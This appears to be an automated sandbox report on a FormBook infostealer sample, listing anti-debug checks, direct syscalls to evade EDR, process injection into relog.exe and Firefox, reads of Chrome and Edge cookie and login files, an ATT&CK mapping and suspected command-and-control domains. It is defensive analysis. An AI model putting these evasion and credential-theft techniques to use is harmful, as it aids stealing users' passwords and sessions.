Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764B00 mov eax, dword ptr fs:[00000030h]	0_2_02764B00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271CBF0 mov eax, dword ptr fs:[00000030h]	0_2_0271CBF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BEBFC mov eax, dword ptr fs:[00000030h]	0_2_026BEBFC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698BF0 mov eax, dword ptr fs:[00000030h]	0_2_02698BF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698BF0 mov eax, dword ptr fs:[00000030h]	0_2_02698BF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698BF0 mov eax, dword ptr fs:[00000030h]	0_2_02698BF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B0BCB mov eax, dword ptr fs:[00000030h]	0_2_026B0BCB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B0BCB mov eax, dword ptr fs:[00000030h]	0_2_026B0BCB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B0BCB mov eax, dword ptr fs:[00000030h]	0_2_026B0BCB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273EBD0 mov eax, dword ptr fs:[00000030h]	0_2_0273EBD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690BCD mov eax, dword ptr fs:[00000030h]	0_2_02690BCD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690BCD mov eax, dword ptr fs:[00000030h]	0_2_02690BCD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690BCD mov eax, dword ptr fs:[00000030h]	0_2_02690BCD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02744BB0 mov eax, dword ptr fs:[00000030h]	0_2_02744BB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02744BB0 mov eax, dword ptr fs:[00000030h]	0_2_02744BB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0BBE mov eax, dword ptr fs:[00000030h]	0_2_026A0BBE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0BBE mov eax, dword ptr fs:[00000030h]	0_2_026A0BBE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726870 mov eax, dword ptr fs:[00000030h]	0_2_02726870
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726870 mov eax, dword ptr fs:[00000030h]	0_2_02726870
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271E872 mov eax, dword ptr fs:[00000030h]	0_2_0271E872
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271E872 mov eax, dword ptr fs:[00000030h]	0_2_0271E872
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A2840 mov ecx, dword ptr fs:[00000030h]	0_2_026A2840
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694859 mov eax, dword ptr fs:[00000030h]	0_2_02694859
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694859 mov eax, dword ptr fs:[00000030h]	0_2_02694859
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C0854 mov eax, dword ptr fs:[00000030h]	0_2_026C0854
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273483A mov eax, dword ptr fs:[00000030h]	0_2_0273483A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273483A mov eax, dword ptr fs:[00000030h]	0_2_0273483A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA830 mov eax, dword ptr fs:[00000030h]	0_2_026CA830
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov eax, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov eax, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov eax, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov ecx, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov eax, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov eax, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271C810 mov eax, dword ptr fs:[00000030h]	0_2_0271C810
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275A8E4 mov eax, dword ptr fs:[00000030h]	0_2_0275A8E4
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC8F9 mov eax, dword ptr fs:[00000030h]	0_2_026CC8F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC8F9 mov eax, dword ptr fs:[00000030h]	0_2_026CC8F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE8C0 mov eax, dword ptr fs:[00000030h]	0_2_026BE8C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027608C0 mov eax, dword ptr fs:[00000030h]	0_2_027608C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271C89D mov eax, dword ptr fs:[00000030h]	0_2_0271C89D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690887 mov eax, dword ptr fs:[00000030h]	0_2_02690887
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D096E mov eax, dword ptr fs:[00000030h]	0_2_026D096E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D096E mov edx, dword ptr fs:[00000030h]	0_2_026D096E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D096E mov eax, dword ptr fs:[00000030h]	0_2_026D096E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B6962 mov eax, dword ptr fs:[00000030h]	0_2_026B6962
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B6962 mov eax, dword ptr fs:[00000030h]	0_2_026B6962
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B6962 mov eax, dword ptr fs:[00000030h]	0_2_026B6962
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02734978 mov eax, dword ptr fs:[00000030h]	0_2_02734978
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02734978 mov eax, dword ptr fs:[00000030h]	0_2_02734978
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271C97C mov eax, dword ptr fs:[00000030h]	0_2_0271C97C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764940 mov eax, dword ptr fs:[00000030h]	0_2_02764940
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02710946 mov eax, dword ptr fs:[00000030h]	0_2_02710946
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0272892B mov eax, dword ptr fs:[00000030h]	0_2_0272892B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271892A mov eax, dword ptr fs:[00000030h]	0_2_0271892A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271C912 mov eax, dword ptr fs:[00000030h]	0_2_0271C912
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02688918 mov eax, dword ptr fs:[00000030h]	0_2_02688918
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02688918 mov eax, dword ptr fs:[00000030h]	0_2_02688918
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E908 mov eax, dword ptr fs:[00000030h]	0_2_0270E908
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E908 mov eax, dword ptr fs:[00000030h]	0_2_0270E908
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271E9E0 mov eax, dword ptr fs:[00000030h]	0_2_0271E9E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C29F9 mov eax, dword ptr fs:[00000030h]	0_2_026C29F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C29F9 mov eax, dword ptr fs:[00000030h]	0_2_026C29F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275A9D3 mov eax, dword ptr fs:[00000030h]	0_2_0275A9D3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027269C0 mov eax, dword ptr fs:[00000030h]	0_2_027269C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C49D0 mov eax, dword ptr fs:[00000030h]	0_2_026C49D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027189B3 mov esi, dword ptr fs:[00000030h]	0_2_027189B3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027189B3 mov eax, dword ptr fs:[00000030h]	0_2_027189B3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027189B3 mov eax, dword ptr fs:[00000030h]	0_2_027189B3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026909AD mov eax, dword ptr fs:[00000030h]	0_2_026909AD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026909AD mov eax, dword ptr fs:[00000030h]	0_2_026909AD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A29A0 mov eax, dword ptr fs:[00000030h]	0_2_026A29A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A29A0 mov eax, dword ptr fs:[00000030h]	0_2_026A29A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A29A0 mov eax, dword ptr fs:[00000030h]	0_2_026A29A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A29A0 mov eax, dword ptr fs:[00000030h]	0_2_026A29A0

Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BE70C8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00BE70C8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BE8B7B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00BE8B7B

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtOpenKeyEx: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQueryValueKey: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtTerminateThread: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\play.exe	Section loaded: NULL target: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\play.exe	Section loaded: NULL target: C:\Windows\SysWOW64\relog.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\relog.exe

Thread register set: target process: 7852

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\relog.exe

Thread APC queued: target process: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Jump to behavior

Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: aAqvujXSGNo.exe, 00000004.00000000.1977051343.0000000001900000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104240210.0000000001901000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000000.2132144202.00000000014D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: aAqvujXSGNo.exe, 00000004.00000000.1977051343.0000000001900000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104240210.0000000001901000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000000.2132144202.00000000014D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: aAqvujXSGNo.exe, 00000004.00000000.1977051343.0000000001900000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104240210.0000000001901000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000000.2132144202.00000000014D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: aAqvujXSGNo.exe, 00000004.00000000.1977051343.0000000001900000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104240210.0000000001901000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000000.2132144202.00000000014D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\play.exe

Code function: 0_2_00BE86AF GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00BE86AF

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\relog.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	312 Process Injection	2 Virtualization/Sandbox Evasion	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	312 Process Injection	LSASS Memory	131 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Abuse Elevation Control Mechanism	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
play.exe	55%	ReversingLabs	Win32.Backdoor.FormBook
play.exe	58%	Virustotal		Browse
play.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com	0%	Virustotal	Browse
natroredirect.natrocdn.com	0%	Virustotal	Browse
www.shipincheshi.skin	1%	Virustotal	Browse
pilibit.site	0%	Virustotal	Browse
www.dom-2.online	0%	Virustotal	Browse
shops.vipshopbuy.com	0%	Virustotal	Browse
206.23.85.13.in-addr.arpa	1%	Virustotal	Browse
23ddv.top	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
